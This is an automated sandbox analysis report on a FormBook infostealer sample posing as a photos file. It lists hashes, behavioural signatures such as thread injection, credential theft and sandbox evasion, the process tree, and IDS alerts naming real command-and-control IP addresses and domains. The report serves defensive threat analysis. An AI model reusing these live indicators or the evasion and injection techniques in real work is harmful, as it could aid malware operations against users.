Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FOTO#U011eRAFLAR.exe

Overview

General Information

Sample name:FOTO#U011eRAFLAR.exe
renamed because original name is a hash value
Original sample name:FOTORAFLAR.exe
Analysis ID:1554622
MD5:0bb932f92b40eec8d5bc5b595b948096
SHA1:80b4d5920f31854c1cdcd64eee626cb3d00b711d
SHA256:e8b8745486749347b6b3621bce50bfb3d5ba080fa71bf30c444dc86def6e56c3
Tags:exeHUNuser-smica83
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • FOTO#U011eRAFLAR.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe" MD5: 0BB932F92B40EEC8D5BC5B595B948096)
    • svchost.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • GhotoFFnRo.exe (PID: 3568 cmdline: "C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winver.exe (PID: 7872 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)
          • GhotoFFnRo.exe (PID: 4176 cmdline: "C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8024 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.2012145210.0000000005860000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3546137914.0000000000F40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3545010767.0000000000830000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3547691925.0000000004ED0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.2011124026.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe" , CommandLine: "C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe, NewProcessName: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe, OriginalFileName: C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 7872, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe" , ProcessId: 4176, ProcessName: GhotoFFnRo.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe", CommandLine: "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe", ParentImage: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe, ParentProcessId: 7492, ParentProcessName: FOTO#U011eRAFLAR.exe, ProcessCommandLine: "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe", ProcessId: 7508, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe", CommandLine: "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe", ParentImage: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe, ParentProcessId: 7492, ParentProcessName: FOTO#U011eRAFLAR.exe, ProcessCommandLine: "C:\Users\user\Desktop\FOTO#U011eRAFLAR.exe", ProcessId: 7508, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-12T18:47:17.633437+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449730TCP
                2024-11-12T18:47:57.501910+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449738TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-12T18:47:46.267595+010020507451Malware Command and Control Activity Detected192.168.2.44973698.124.224.1780TCP
                2024-11-12T18:48:09.777331+010020507451Malware Command and Control Activity Detected192.168.2.449798104.21.41.7480TCP
                2024-11-12T18:48:23.537681+010020507451Malware Command and Control Activity Detected192.168.2.449876172.67.137.23880TCP
                2024-11-12T18:48:37.271181+010020507451Malware Command and Control Activity Detected192.168.2.44995538.47.232.20280TCP
                2024-11-12T18:48:59.030683+010020507451Malware Command and Control Activity Detected192.168.2.45001813.248.169.4880TCP
                2024-11-12T18:49:13.004291+010020507451Malware Command and Control Activity Detected192.168.2.45002238.47.207.16480TCP
                2024-11-12T18:49:26.483031+010020507451Malware Command and Control Activity Detected192.168.2.4500263.33.130.19080TCP
                2024-11-12T18:49:40.253507+010020507451Malware Command and Control Activity Detected192.168.2.450030103.21.221.480TCP
                2024-11-12T18:49:54.144579+010020507451Malware Command and Control Activity Detected192.168.2.450034203.161.46.20180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-12T18:47:46.267595+010028554651A Network Trojan was detected192.168.2.44973698.124.224.1780TCP
                2024-11-12T18:48:09.777331+010028554651A Network Trojan was detected192.168.2.449798104.21.41.7480TCP
                2024-11-12T18:48:23.537681+010028554651A Network Trojan was detected192.168.2.449876172.67.137.23880TCP
                2024-11-12T18:48:37.271181+010028554651A Network Trojan was detected192.168.2.44995538.47.232.20280TCP
                2024-11-12T18:48:59.030683+010028554651A Network Trojan was detected192.168.2.45001813.248.169.4880TCP
                2024-11-12T18:49:13.004291+010028554651A Network Trojan was detected192.168.2.45002238.47.207.16480TCP
                2024-11-12T18:49:26.483031+010028554651A Network Trojan was detected192.168.2.4500263.33.130.19080TCP
                2024-11-12T18:49:40.253507+010028554651A Network Trojan was detected192.168.2.450030103.21.221.480TCP
                2024-11-12T18:49:54.144579+010028554651A Network Trojan was detected192.168.2.450034203.161.46.20180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-12T18:48:02.074779+010028554641A Network Trojan was detected192.168.2.449758104.21.41.7480TCP
                2024-11-12T18:48:04.625836+010028554641A Network Trojan was detected192.168.2.449770104.21.41.7480TCP
                2024-11-12T18:48:07.192766+010028554641A Network Trojan was detected192.168.2.449782104.21.41.7480TCP
                2024-11-12T18:48:15.769963+010028554641A Network Trojan was detected192.168.2.449830172.67.137.23880TCP
                2024-11-12T18:48:18.276499+010028554641A Network Trojan was detected192.168.2.449845172.67.137.23880TCP
                2024-11-12T18:48:20.844466+010028554641A Network Trojan was detected192.168.2.449861172.67.137.23880TCP
                2024-11-12T18:48:29.646287+010028554641A Network Trojan was detected192.168.2.44990838.47.232.20280TCP
                2024-11-12T18:48:32.161899+010028554641A Network Trojan was detected192.168.2.44992338.47.232.20280TCP
                2024-11-12T18:48:34.724273+010028554641A Network Trojan was detected192.168.2.44993938.47.232.20280TCP
                2024-11-12T18:48:51.297347+010028554641A Network Trojan was detected192.168.2.45001513.248.169.4880TCP
                2024-11-12T18:48:53.918069+010028554641A Network Trojan was detected192.168.2.45001613.248.169.4880TCP
                2024-11-12T18:48:56.457408+010028554641A Network Trojan was detected192.168.2.45001713.248.169.4880TCP
                2024-11-12T18:49:05.580737+010028554641A Network Trojan was detected192.168.2.45001938.47.207.16480TCP
                2024-11-12T18:49:07.928658+010028554641A Network Trojan was detected192.168.2.45002038.47.207.16480TCP
                2024-11-12T18:49:10.473142+010028554641A Network Trojan was detected192.168.2.45002138.47.207.16480TCP
                2024-11-12T18:49:18.835470+010028554641A Network Trojan was detected192.168.2.4500233.33.130.19080TCP
                2024-11-12T18:49:21.375038+010028554641A Network Trojan was detected192.168.2.4500243.33.130.19080TCP
                2024-11-12T18:49:23.922622+010028554641A Network Trojan was detected192.168.2.4500253.33.130.19080TCP
                2024-11-12T18:49:32.628723+010028554641A Network Trojan was detected192.168.2.450027103.21.221.480TCP
                2024-11-12T18:49:35.159902+010028554641A Network Trojan was detected192.168.2.450028103.21.221.480TCP
                2024-11-12T18:49:37.707674+010028554641A Network Trojan was detected192.168.2.450029103.21.221.480TCP
                2024-11-12T18:49:46.307375+010028554641A Network Trojan was detected192.168.2.450031203.161.46.20180TCP
                2024-11-12T18:49:48.868214+010028554641A Network Trojan was detected192.168.2.450032203.161.46.20180TCP
                2024-11-12T18:49:52.253277+010028554641A Network Trojan was detected192.168.2.450033203.161.46.20180TCP
                2024-11-12T18:50:00.395741+010028554641A Network Trojan was detected192.168.2.450035104.21.4.9380TCP
                2024-11-12T18:50:02.925585+010028554641A Network Trojan was detected192.168.2.450036104.21.4.9380TCP
                2024-11-12T18:50:05.476478+010028554641A Network Trojan was detected192.168.2.450037104.21.4.9380TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: FOTO#U011eRAFLAR.exeAvira: detected
                Source: http://www.nonpressure.beautyAvira URL Cloud: Label: malware
                Source: http://www.nonpressure.beauty/naci/Avira URL Cloud: Label: malware
                Source: FOTO#U011eRAFLAR.exeReversingLabs: Detection: 71%
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2012145210.0000000005860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3546137914.0000000000F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3545010767.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3547691925.0000000004ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2011124026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3546082583.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3546078918.0000000002AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2011753567.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: FOTO#U011eRAFLAR.exeJoe Sandbox ML: detected
                Source: FOTO#U011eRAFLAR.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winver.pdb source: svchost.exe, 00000001.00000003.1980070090.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1980124475.000000000323B000.00000004.00000020.00020000.00000000.sdmp, GhotoFFnRo.exe, 00000005.00000002.3545608911.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GhotoFFnRo.exe, 00000005.00000000.1938013471.0000000000BBE000.00000002.00000001.01000000.00000005.sdmp, GhotoFFnRo.exe, 00000007.00000002.3545711657.0000000000BBE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: FOTO#U011eRAFLAR.exe, 00000000.00000003.1694500272.0000000003860000.00000004.00001000.00020000.00000000.sdmp, FOTO#U011eRAFLAR.exe, 00000000.00000003.1695007879.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2011442081.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919020737.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1920958794.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2011442081.000000000399E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2014121501.00000000048B5000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2011547954.0000000004708000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3546458580.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3546458580.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: FOTO#U011eRAFLAR.exe, 00000000.00000003.1694500272.0000000003860000.00000004.00001000.00020000.00000000.sdmp, FOTO#U011eRAFLAR.exe, 00000000.00000003.1695007879.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2011442081.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919020737.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1920958794.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2011442081.000000000399E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, winver.exe, 00000006.00000003.2014121501.00000000048B5000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2011547954.0000000004708000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3546458580.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3546458580.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000001.00000003.1980070090.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1980124475.000000000323B000.00000004.00000020.00020000.00000000.sdmp, GhotoFFnRo.exe, 00000005.00000002.3545608911.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: winver.exe, 00000006.00000002.3545292765.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3547176638.000000000508C000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000002A9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2310345131.000000002248C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: winver.exe, 00000006.00000002.3545292765.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.3547176638.000000000508C000.00000004.10000000.00040000.00000000.sdmp, GhotoFFnRo.exe, 00000007.00000002.3546321653.0000000002A9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2310345131.000000002248C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D868AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00D868AD
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D8680C FindFirstFileW,FindClose,0_2_00D8680C
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D7CF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D7CF94
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D7D2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D7D2C7
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D89560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00D89560
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D896BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00D896BB
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D7DADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00D7DADC
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D89A49 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00D89A49
                Source: C:\Users\user\Desktop\FOTO#U011eRAFLAR.exeCode function: 0_2_00D85BB5 FindFirstFileW,FindNextFileW,FindClose,0_2_00D85BB5
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0084C750 FindFirstFileW,FindNextFileW,FindClose,6_2_0084C750
                Source: C:\Windows\SysWOW64\winver.exeCode function: 4x nop then xor eax, eax6_2_00839E80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 4x nop then pop edi6_2_00852848

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49798 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49798 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49782 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49845 -> 172.67.137.238:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49876 -> 172.67.137.238:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49876 -> 172.67.137.238:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49861 -> 172.67.137.238:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49908 -> 38.47.232.202:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49923 -> 38.47.232.202:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49830 -> 172.67.137.238:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49955 -> 38.47.232.202:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49939 -> 38.47.232.202:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49955 -> 38.47.232.202:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50018 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50030 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 203.161.46.201:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 104.21.4.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 104.21.4.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 104.21.4.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 203.161.46.201:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50034 -> 203.161.46.201:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 203.161.46.201:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 203.161.46.201:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 38.47.207.164:80
                Source: DNS query: www.darkvader.xyz
                Source: DNS query: www.smirpox.xyz
                Source: Joe Sandbox ViewIP Address: 103.21.221.4 103.21.221.4
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49730
